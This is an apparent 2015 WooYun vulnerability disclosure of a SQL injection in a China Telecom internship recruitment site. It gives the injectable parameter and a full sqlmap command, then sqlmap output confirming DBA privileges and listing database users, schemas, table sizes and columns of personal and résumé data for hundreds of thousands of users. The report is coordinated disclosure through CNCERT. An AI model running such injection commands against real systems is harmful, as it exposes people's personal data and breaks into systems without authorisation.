当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144422

漏洞标题:中国电信之翼实习某处修复不完全仍可SQL注入(DBA权限+几十万用户泄漏+你的简历信息我知道)

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-10-01 19:07

修复时间:2015-11-24 17:06

公开时间:2015-11-24 17:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-01: 细节已通知厂商并且等待厂商处理中
2015-10-10: 厂商已经确认,细节仅向厂商公开
2015-10-20: 细节向核心白帽子及相关领域专家公开
2015-10-30: 细节向普通白帽子公开
2015-11-09: 细节向实习白帽子公开
2015-11-24: 细节向公众公开

简要描述:

以前测试过,在职位搜索的时候是可以注入的,即便修复,还是可以增加level获得注入,每天有提交,但是半年过去了,也修复好了,继续抓包寻找,发现了另一处注入。

详细说明:

抓包得到一个注入点如下:

http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1
id存在注入
http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1'
测试,返回错误结果
MySQL Error
Message: MySQL Query Error
SQL: select * from shixibao_uchome.mm_postclass_detail WHERE parent_id =1斜杠'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '斜杠'' at line 1
Errno.: 1064
Click here to seek help.


可以看出'被过滤成“斜杠'”了,但是过滤不严格,仍可导致注入,增加level等级后完全可以绕过过滤进行注入

0.jpg


未添加--level 5测试结果

1.jpg


添加--level 5测试结果

2.jpg


3.jpg


sqlmap.py -u "http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1" --threads 10 --dbms "MySQL" -p id --level 5 --current-db --current-user --is-dba --hostname


sqlmap构造注入参数进行测试

[16:29:08] [INFO] testing MySQL
[16:29:08] [INFO] confirming MySQL
[16:29:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL >= 5.0.0
[16:29:08] [INFO] fetching current user
current user: 'admin@%'
[16:29:08] [INFO] fetching current database
current database: 'shixibao_uchome'
[16:29:08] [INFO] fetching server hostname
hostname: 'WIN-9VCJIM9JGJ2'
[16:29:08] [INFO] testing if current user is DBA
[16:29:08] [INFO] fetching current user
current user is DBA: True
[16:23:38] [INFO] testing MySQL
[16:23:38] [INFO] confirming MySQL
[16:23:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL >= 5.0.0
[16:23:38] [INFO] fetching database users
database management system users [8]:
[*] ''@'localhost'
[*] 'admin'@'%'
[*] 'admin'@'localhost'
[*] 'cem'@'%'
[*] 'pma'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
available databases [16]:
[*] cdcol
[*] cem_db
[*] game
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] shixibao
[*] shixibao_uc
[*] shixibao_uchome
[*] shixibao_uchome_20140525
[*] test
[*] testmql
[*] ultrax
[*] webauth
[*] zhiweibeifen
Database: shixibao_uchome
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| mm_hgz_user | 419959 | 用户
| uchome_spaceinfo | 232626 |
| uchome_creditlog | 77958 |
| mm_member_view | 43670 |
| uchome_member | 43670 | 成员
| uchome_space | 39361 |
| uchome_spacefield | 38057 |
| mm_usereduinfo | 36957 | 用户教育信息
| mm_userresumeinfo | 36957 | 用户简历信息
| mm_userbaseinfo | 35948 |
| mm_userinfo | 35948 | 用户信息
| mm_zhiweiapply_view | 34043 |
| mm_zhiweiinfo | 34043 |
| mm_zhiweiapply_view_1 | 33827 |
| mm_zhiwei_temp | 33302 |
| mm_userinfo_zhiweiinfo_all | 32937 |
| uchome_notification | 22243 |
| uchome_activity_notice | 22100 |
| mm_mailqueue | 21633 |
| mm_youngmembers | 15836 |
| uchome_resume | 13136 |
| mm_userskill_map | 6584 |
| mm_department | 5276 |
| mm_deptinfo | 5240 |
| mm_delivery | 4589 |
| mm_compus_posdeli_view | 4184 |
| mm_useruniversmap | 4157 |
| mm_userunivsmap_view | 4157 |
| mm_personal_zhaopin | 3627 |
| mm_young_tribe | 3222 |
| mm_univs | 3209 |
| mm_user_upload | 2874 |
| jobcollect | 2494 |
| mm_company_interest | 2165 |
| uchome_usertask | 1190 |
| mm_fam_enterprise | 1100 |
| mm_company_visitor | 865 |
| mm_enterprise_zhaopin | 857 |
| uchome_comment | 817 |
| uchome_member_third | 732 |
| mm_post_recommend | 728 |
| mm_zhiwei_questions | 691 |
| mm_home_card | 594 |
| mm_userreg_channel | 559 |
| mm_follow | 510 |
| uchome_stat | 502 |
| mm_zhiwei_send | 428 |
| mm_city | 357 |
| uchome_friend | 350 |
| uchome_coupon | 300 |
| uchome_pic | 296 |
| uchome_visitor | 225 |
| uchome_tagspace | 221 |
| uchome_tagblog | 217 |
| uchome_feed | 203 |
| uchome_tag | 176 |
| mm_employinfo | 174 |
| mm_employinfo_view | 174 |
| mm_score_item | 152 |
| mm_dept_location | 147 |
| uchome_zan | 138 |
| uchome_blogfield | 128 |
| mm_delivercont_view | 123 |
| uchome_blog | 122 |
| uchome_doing | 117 |
| uchome_config | 108 |
| mm_score_stat | 106 |
| mm_lucky_log | 98 |
| mm_score_mark | 97 |
| mm_delivery_attach | 94 |
| uchome_album | 92 |
| mm_taskuser_map | 89 |
| mm_score_marker | 81 |
| mm_themes | 71 |
| mm_score_task | 68 |
| uchome_post | 66 |
| mm_usercode_map | 52 |
| uchome_creditrule | 47 |
| uchome_thread | 44 |
| mm_zhiwei_replayments | 43 |
| mm_grades_user | 42 |
| mm_postclass_detail | 38 |
| mm_provinces | 34 |
| mm_score_template | 34 |
| mm_interview_notice | 26 |
| mm_video_course | 25 |
| uchome_magic | 25 |
| mm_young_report | 24 |
| uchome_magicstore | 24 |
| mm_score_eachsum | 22 |
| mm_replayments | 21 |
| mm_young_report_map | 21 |
| mm_younger_gd_temp | 20 |
| mm_taskcompany_map | 18 |
| mm_attach_files | 15 |
| mm_lucky_wall | 15 |
| uchome_click | 15 |
| mm_subscribe_job | 14 |
| mm_audition_task | 13 |
| mm_questions | 13 |
| uchome_profield | 13 |
| mm_postclass | 12 |
| mm_questions_view | 12 |
| mm_replayments_view | 12 |
| mm_dynamic | 11 |
| uchome_event | 11 |
| uchome_eventfield | 11 |
| uchome_userevent | 11 |
| mm_audition_user | 10 |
| mm_mail_template | 10 |
| mm_report | 10 |
| uchome_mtag | 10 |
| mm_talent_pool | 9 |
| uchome_poke | 9 |
| uchome_usergroup | 9 |
| uchome_data | 8 |
| mm_jianzhi_delivery | 7 |
| mm_sys_post | 7 |
| mm_ztask_classify | 7 |
| uchome_cron | 7 |
| uchome_task | 7 |
| uchome_eventclass | 6 |
| uchome_job | 6 |
| uchome_spacelog | 6 |
| mm_post_attachment | 5 |
| mm_sys_picplay | 5 |
| mm_video_wall | 5 |
| uchome_class | 5 |
| uchome_polloption | 5 |
| mm_like | 4 |
| mm_video_score | 4 |
| uchome_magicinlog | 4 |
| mm_grades_enter | 3 |
| uchome_picfield | 3 |
| uchome_statuser | 3 |
| uchome_usermagic | 3 |
| mm_grade_template | 2 |
| mm_task | 2 |
| uchome_eventpic | 2 |
| uchome_mailqueue | 2 |
| uchome_report | 2 |
| mm_compus_news | 1 |
| mm_score | 1 |
| mm_strategies | 1 |
| mm_students_star | 1 |
| mm_whos_online | 1 |
| uchome_block | 1 |
| uchome_home_card | 1 |
| uchome_invite | 1 |
| uchome_poll | 1 |
| uchome_pollfield | 1 |
| uchome_session | 1 |
| uchome_show | 1 |
+----------------------------+---------+
Database: shixibao
+-------------------------------------+---------+
| Table | Entries |
+-------------------------------------+---------+
| phome_ecms_zhiwei_crawl_copy | 1382607 |
| phome_ecms_jianzhi_crawl | 376758 |
| phome_ecms_zhiwei_crawl_copy_cl | 114558 |
| phome_ecms_zhiwei_crawl | 56813 |
| phome_ecms_zhiwei_crawl_sxs_copy | 51662 |
| phome_ecms_zhiwei | 50579 |
| ecms_post_mapping | 34324 |
| mm_zhiweiapply_view | 34043 |
| phome_ecms_zhiwei_crawl_copy_backup | 19955 |
| phome_ecms_zhiwei_data_1 | 13547 |
| phome_ecms_zhiwei_index | 13498 |
| phome_enewsdolog | 2519 |
| ecms_post_mapping_history | 1907 |
| phome_ecms_zhiwei_crawl_test | 1669 |
| phome_ecms_zhiwei_crawl_1 | 1245 |
| phome_ecms_zhiwei_crawl_sxs | 1024 |
| phome_enewsdownerror | 1008 |
| phome_enewssearch | 942 |
| phome_ecms_jianzhi_crawl_test | 729 |
| phome_enewslog | 456 |
| yjsqzw | 385 |
| phome_enewsf | 199 |
| phome_enewsmemberadd | 75 |
| phome_enewsmember | 73 |
| phome_enewstempbak | 61 |
| phome_enewsclass | 56 |
| phome_enewsclass_stats | 56 |
| phome_enewsclassadd | 56 |
| phome_enewstempdt | 56 |
| phome_enewsdiggips | 52 |
| phome_ecms_info | 41 |
| phome_ecms_info_data_1 | 41 |
| phome_ecms_info_index | 41 |
| phome_ecms_locationorder | 34 |
| phome_ecms_news | 34 |
| phome_ecms_news_data_1 | 34 |
| phome_ecms_news_index | 34 |
| phome_ecms_zhiwei_history | 32 |
| phome_ecms_download | 24 |
| phome_ecms_download_data_1 | 24 |
| phome_ecms_download_index | 24 |
| phome_ecms_movie | 24 |
| phome_ecms_movie_data_1 | 24 |
| phome_ecms_movie_index | 24 |
| phome_ecms_shop | 24 |
| phome_ecms_shop_data_1 | 24 |
| phome_ecms_shop_index | 24 |
| phome_enewsbq | 23 |
| phome_ecms_article | 18 |
| phome_ecms_article_data_1 | 18 |
| phome_ecms_article_index | 18 |
| phome_enewsbqtemp | 17 |
| phome_enewslink | 14 |
| phome_enewslisttemp | 13 |
| phome_enewstable | 13 |
| phome_ecms_flash | 12 |
| phome_ecms_flash_data_1 | 12 |
| phome_ecms_flash_index | 12 |
| phome_enewsmemberf | 12 |
| phome_enewsmod | 12 |
| phome_enewstempvar | 12 |
| phome_enewsnewstemp | 11 |
| phome_enewsfeedbackf | 9 |
| phome_ecms_photo | 7 |
| phome_ecms_photo_data_1 | 7 |
| phome_ecms_photo_index | 7 |
| phome_enewsshoppayfs | 6 |
| phome_ecms_tongzhi | 5 |
| phome_ecms_tongzhi_data_1 | 5 |
| phome_ecms_tongzhi_index | 5 |
| phome_enewsfile_1 | 5 |
| phome_enewsnotcj | 5 |
| phome_enewsbqclass | 4 |
| phome_enewsfile_other | 4 |
| phome_enewsmembergroup | 4 |
| phome_enewsplayer | 4 |
| phome_enewsshopps | 4 |
| phome_enewsuser | 4 |
| phome_enewsuseradd | 4 |
| phome_enewsuserloginck | 4 |
| phome_enewszt | 4 |
| phome_enewsztadd | 4 |
| phome_enewsclassnavcache | 3 |
| phome_enewspage | 3 |
| phome_enewspayapi | 3 |
| phome_enewsadminstyle | 2 |
| phome_enewsclasstemp | 2 |
| phome_enewsgbook | 2 |
| phome_enewsmemberform | 2 |
| phome_enewssearchtemp | 2 |
| phome_enewsspacestyle | 2 |
| phome_enewsvotetemp | 2 |
| phome_enewswapstyle | 2 |
| phome_ecms_infoclass_news | 1 |
| phome_enewsadclass | 1 |
| phome_enewsclass_stats_set | 1 |
| phome_enewsdo | 1 |
| phome_enewsfeedbackclass | 1 |
| phome_enewsfile_member | 1 |
| phome_enewsgbookclass | 1 |
| phome_enewsgroup | 1 |
| phome_enewsindexpage | 1 |
| phome_enewsinfoclass | 1 |
| phome_enewsjstemp | 1 |
| phome_enewsloginfail | 1 |
| phome_enewspageclass | 1 |
| phome_enewspicclass | 1 |
| phome_enewspl_set | 1 |
| phome_enewspltemp | 1 |
| phome_enewspostserver | 1 |
| phome_enewsprinttemp | 1 |
| phome_enewspublic | 1 |
| phome_enewspublic_update | 1 |
| phome_enewspubtemp | 1 |
| phome_enewsshop_set | 1 |
| phome_enewstempgroup | 1 |
| phome_enewsuserlist | 1 |
| phome_enewsuserlistclass | 1 |
| phome_enewsztclass | 1 |
+-------------------------------------+---------+
Database: shixibao_uc
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| uc_members | 52392 |
| uc_memberfields | 24057 |
| uc_comments | 739 |
| uc_notelist | 573 |
| uc_friends | 144 |
| uc_pms | 74 |
| uc_settings | 27 |
| uc_newpm | 14 |
| uc_applications | 4 |
| uc_failedlogins | 2 |
| uc_protectedmembers | 2 |
+---------------------+---------+
Database: shixibao_uchome_20140525
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| uchome_spaceinfo | 9899 |
| uchome_feed | 3915 |
| uchome_creditlog | 2886 |
| uchome_space | 1364 |
| uchome_spacefield | 1343 |
| mm_member_view | 1335 |
| uchome_member | 1335 |
| uchome_resume | 1057 |
| uchome_statuser | 511 |
| uchome_visitor | 119 |
| uchome_config | 108 |
| uchome_usertask | 77 |
| mm_department | 75 |
| uchome_creditrule | 47 |
| uchome_magic | 25 |
| uchome_magicstore | 24 |
| uchome_friend | 16 |
| uchome_click | 15 |
| uchome_stat | 12 |
| uchome_usergroup | 9 |
| mm_postclass | 7 |
| uchome_data | 7 |
| uchome_task | 7 |
| uchome_eventclass | 6 |
| uchome_job | 6 |
| uchome_cron | 5 |
| uchome_polloption | 5 |
| uchome_notification | 4 |
| uchome_event | 3 |
| uchome_eventfield | 3 |
| uchome_profield | 3 |
| uchome_userevent | 3 |
| uchome_magicinlog | 2 |
| uchome_usermagic | 2 |
| mm_deptinfo | 1 |
| uchome_mailcron | 1 |
| uchome_mailqueue | 1 |
| uchome_poll | 1 |
| uchome_pollfield | 1 |
+---------------------+---------+
Database: ultrax
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_common_district | 45051 |
| pre_common_setting | 406 |
| pre_common_member | 138 |
| pre_common_member_count | 125 |
| pre_common_member_field_forum | 125 |
| pre_common_member_field_home | 125 |
| pre_common_member_profile | 125 |
| pre_common_member_status | 125 |
| pre_common_block_style | 103 |
| pre_common_syscache | 103 |
| pre_common_smiley | 85 |
| pre_forum_statlog | 82 |
| pre_common_admincp_perm | 67 |
| pre_common_member_profile_setting | 51 |
| pre_common_nav | 48 |
| pre_common_stylevar | 45 |
| pre_forum_forumfield | 37 |
| pre_forum_forum | 36 |
| pre_common_credit_rule | 31 |
| pre_common_stat | 28 |
| pre_common_credit_rule_log | 26 |
| pre_common_cron | 20 |
| pre_common_onlinetime | 20 |
| pre_common_usergroup | 20 |
| pre_common_usergroup_field | 20 |
| pre_home_click | 15 |
| pre_common_plugin | 12 |
| pre_forum_medal | 10 |
| pre_common_admingroup | 7 |
| pre_forum_typeoption | 6 |
| pre_common_admincp_group | 5 |
| pre_common_friendlink | 5 |
| pre_forum_post | 5 |
| pre_forum_post_tableid | 5 |
| pre_forum_bbcode | 4 |
| pre_forum_onlinelist | 4 |
| pre_forum_thread | 4 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| pre_forum_sofa | 3 |
| pre_common_admincp_session | 2 |
| pre_common_block | 2 |
| pre_common_failedlogin | 2 |
| pre_common_statuser | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_forum_threadcalendar | 2 |
| pre_forum_threadhot | 2 |
| pre_mobile_setting | 2 |
| pre_mobile_wsq_threadlist | 2 |
| pre_common_diy_data | 1 |
| pre_common_style | 1 |
| pre_common_template | 1 |
| pre_forum_filter_post | 1 |
| pre_forum_threadpartake | 1 |
| pre_forum_threadprofile | 1 |
| pre_home_favorite | 1 |
+-----------------------------------+---------+
Database: cem_db
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| cem_circuit_province_calc | 1762584 |
| cem_circuit_province_quarter_calc | 587528 |
| cem_kmeans_customer_calc | 439524 |
| cem_sfactor_pro_customer_calc | 424572 |
| cem_circuit_qoe | 266167 |
| cem_sfactor_all_customer_calc | 188592 |
| data_original_maintain | 161114 |
| cem_circuit_province_year_calc | 146882 |
| cem_kmeans_customer_quarter_calc | 146508 |
| cem_sfactor_pro_customer_quarter_calc | 141524 |
| cem_circuit_qoe_quarter | 89263 |
| cem_circuit_calc | 88452 |
| cem_sfactor_all_customer_quarter_calc | 62864 |
| cem_maintain | 57285 |
| cem_kmeans_customer_year_calc | 36627 |
| cem_sfactor_pro_customer_year_calc | 35381 |
| cem_circuit_quarter_calc | 29484 |
| data_original_trouble | 23296 |
| cem_circuit_qoe_year | 22924 |
| cem_sfactor_all_customer_year_calc | 15716 |
| cem_customer_rate | 15305 |
| data_original_circuit | 12712 |
| cem_trouble | 12589 |
| numbers | 10000 |
| cem_circuit_info | 7371 |
| cem_circuit_year_calc | 7371 |
| cem_d_time | 4018 |
| data_original_kaitong | 909 |
| cem_kaitong | 830 |
| buffer_industry_rate | 645 |
| cem_busi_prefect_rate | 372 |
| cem_kmeans_province_calc | 372 |
| cem_sfactor_province_calc | 372 |
| cem_busi_prefect_rate_quarter | 124 |
| cem_kmeans_province_quarter_calc | 124 |
| cem_sfactor_province_quarter_calc | 124 |
| buffer_customer_circuit | 72 |
| cem_province | 38 |
| cem_busi_prefect_rate_year | 31 |
| cem_kmeans_province_year_calc | 31 |
| cem_sfactor_province_year_calc | 31 |
| cem_user_customer_relation | 23 |
| cem_customer | 22 |
| cem_customer_selected | 22 |
| cem_indicator | 16 |
| cem_industry | 10 |
| numbers_small | 10 |
| cem_indicator_expect | 8 |
| cem_indicator_threshold | 8 |
| sys_user | 5 |
| sys_user_role | 5 |
| sys_role | 4 |
| cem_business | 3 |
| cem_data_file | 2 |
+---------------------------------------+---------+
Database: game
+---------------+---------+
| Table | Entries |
+---------------+---------+
| game_outwatch | 16 |
| game_admin | 4 |
| game_node | 4 |
| game_path_map | 3 |
| game_mobile | 2 |
| game_path | 2 |
+---------------+---------+


Database: shixibao_uchome
Table: mm_userinfo
[18 columns]
+------------+-----------------------+
| Column | Type |
+------------+-----------------------+
| birthcity | varchar(20) |
| birthyear | smallint(6) unsigned |
| edu_degree | smallint(6) |
| email | varchar(100) |
| endyear | smallint(6) unsigned |
| major | varchar(255) |
| mobile | varchar(40) |
| msn | varchar(80) |
| name | char(20) |
| qq | varchar(20) |
| residecity | varchar(20) |
| resumename | varchar(100) |
| resumeurl | varchar(100) |
| school | text |
| sex | tinyint(1) |
| startyear | smallint(6) unsigned |
| uid | mediumint(8) unsigned |
| username | char(15) |
+------------+-----------------------+
Database: shixibao_uchome
Table: uchome_member
[9 columns]
+-----------+-----------------------+
| Column | Type |
+-----------+-----------------------+
| companyid | int(50) |
| deptid | int(20) |
| hasresume | varchar(255) |
| isactive | tinyint(4) |
| mail | varchar(100) |
| password | char(32) |
| type | int(5) |
| uid | mediumint(8) unsigned |
| username | char(200) |
+-----------+-----------------------+
Database: shixibao_uchome
Table: mm_hgz_user
[18 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| address | varchar(200) |
| birth | varchar(200) |
| degree | varchar(200) |
| education | text |
| email | varchar(200) |
| evaluation | text |
| height | varchar(200) |
| hometown | varchar(200) |
| id | int(10) |
| intend | text |
| mobile | varchar(200) |
| name | varchar(200) |
| nation | varchar(200) |
| qq | varchar(200) |
| sex | varchar(200) |
| title | varchar(200) |
| weight | varchar(200) |
| zzmm | varchar(200) |
+------------+--------------+
Database: shixibao_uchome
Table: mm_youngmembers
[16 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| age | int(5) |
| city | varchar(100) |
| gender | int(1) |
| iskeyperson | int(1) |
| mail | varchar(200) |
| major | varchar(64) |
| name | varchar(200) |
| phone | varchar(50) |
| school | varchar(200) |
| schoolid | int(11) |
| status | int(10) |
| tribeid | int(200) |
| uid | int(10) |
| updatetime | int(10) |
| wechatId | varchar(200) |
| yixinId | varchar(200) |
+-------------+--------------+


4.jpg


5.jpg


6.jpg


只列出来一部分,其余的几十万用户就不继续了,还有几千万的数据也不分析了!~~~

漏洞证明:

4.jpg


5.jpg


6.jpg


修复方案:

继续过滤!~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-10-10 17:05

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-30 20:13 | _Thorns ( 普通白帽子 | Rank:1064 漏洞数:184 | WooYun is the Bigest gay place :))

    学习了,之前也有这个电信注入点是这样的。